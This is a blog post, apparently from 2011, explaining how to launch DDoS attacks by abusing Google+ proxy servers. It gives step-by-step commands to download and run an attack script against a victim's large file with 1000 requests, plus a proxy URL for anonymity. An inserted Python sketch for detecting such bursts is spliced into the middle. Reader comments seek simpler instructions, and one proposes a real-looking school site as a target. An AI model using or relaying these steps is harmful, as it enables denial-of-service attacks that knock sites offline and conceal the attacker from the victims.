Recently we wrote about ApacheKiller, which freezes a victim server in seconds. New findings by IHTeam show that Google+ servers can be used for a DDoS attack. Let's talk about this ant-sized script. Hey, it is small, but it is worthy.
How does a DDoS attack using Google+ servers work?
When you post a URL in your Google+ status, Google+ fetches a URL summary (an image plus a short description) using the Google+ proxy servers.
The advisory report says the vulnerable pages are "/_/sharebox/linkpreview/" and "gadgets/proxy?".
So if you send many parallel requests, e.g. 1000, they can turn into a DDoS attack that uses the huge bandwidth of the Google+ servers.
How to use the DDoS script to launch a DDoS attack using Google+ servers?
Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com
Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh
Make it executable :
chmod u+x ddos.sh
Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000
Now, let's look at this example :
It is recommended to find the full path to some big file that can be downloaded without a CAPTCHA request.
e.g. http://www.victim-website.com/some-file-url/file-name.mp3
NOTE : Make sure your workstation can handle this many requests; otherwise it will freeze and you will have to forcibly restart it.
e.g. 1000 is a very big number.
The web server log shows an anonymous source (the fetching proxy) instead of the real source IP:
See the sample Apache web server log below.
209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
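Seen from the receiving web server, the log above has a recognisable shape: many requests for one large file, all carrying the Feedfetcher-Google user agent, from several source addresses within seconds. The following detection sketch is an added example, not part of the original post or the advisory; the function name and the thresholds are assumptions, and the sample input is rebuilt from the log entries above plus one constructed browser request.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format, as in the sample log on this page.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)
FETCHER_UA = "Feedfetcher-Google"  # user agent seen in the page's sample log

def find_fetcher_bursts(lines, min_hits=5, window=timedelta(seconds=30)):
    """Report each path the fetcher requested at least min_hits times inside
    one sliding window. Both thresholds are assumptions to tune per site."""
    hits = defaultdict(list)  # path -> [(time, ip, bytes)]
    for line in lines:
        m = LINE_RE.match(line)
        if not m or FETCHER_UA not in m["ua"]:
            continue  # unparsable line or ordinary client
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["path"]].append((ts, m["ip"], size))
    findings = []
    for path, events in hits.items():
        events.sort()  # log lines are not guaranteed to be in time order
        start, best = 0, []
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 > len(best):
                best = events[start:end + 1]  # densest window so far
        if len(best) >= min_hits:
            findings.append({"path": path, "hits": len(best),
                             "source_ips": sorted({ip for _, ip, _ in best}),
                             "bytes": sum(size for _, _, size in best)})
    return findings

# Sample input: the eight entries from the log above, plus one constructed browser hit.
_UA = "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
_FMT = '{} - - [31/Aug/2011:15:34:{} +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "{}"'
SAMPLE = [_FMT.format(ip, sec, _UA) for ip, sec in [
    ("209.85.228.85", "17"), ("209.85.226.88", "17"), ("209.85.228.90", "17"),
    ("209.85.226.91", "17"), ("209.85.226.81", "18"), ("209.85.228.86", "17"),
    ("74.125.152.84", "21"), ("74.125.152.81", "33")]]
SAMPLE.append(_FMT.format("203.0.113.7", "20", "Mozilla/5.0 (X11; Linux x86_64)"))  # constructed

if __name__ == "__main__":
    for finding in find_fetcher_bursts(SAMPLE):
        print(finding)
```

A finding for a large static file is a cue to rate-limit or cache that path for fetcher traffic.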
You can also access it in a browser to remain anonymous, using the example URL below (replace the URL with one of your own choice) :
https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none
If you have any questions or are unable to run this, feel free to write to us.

3 comments
I don't understand how to do this. I only want to know for personal reasons. I tried to DDoS attack my own website and I haven't been able to. How do I do this? Can you make it simpler? Thanks, guys.
Can you help me… I don't understand it… I post it on Google+, what then? Please make it simpler.
./ddos.sh os-zamet-ri.skole.hr/wp-content/uploads/2012/01/IMG_0653.jpg 1000 ?
This no longer works. In access.log it shows your IP, not Google's, any more. I tested this against my own web server.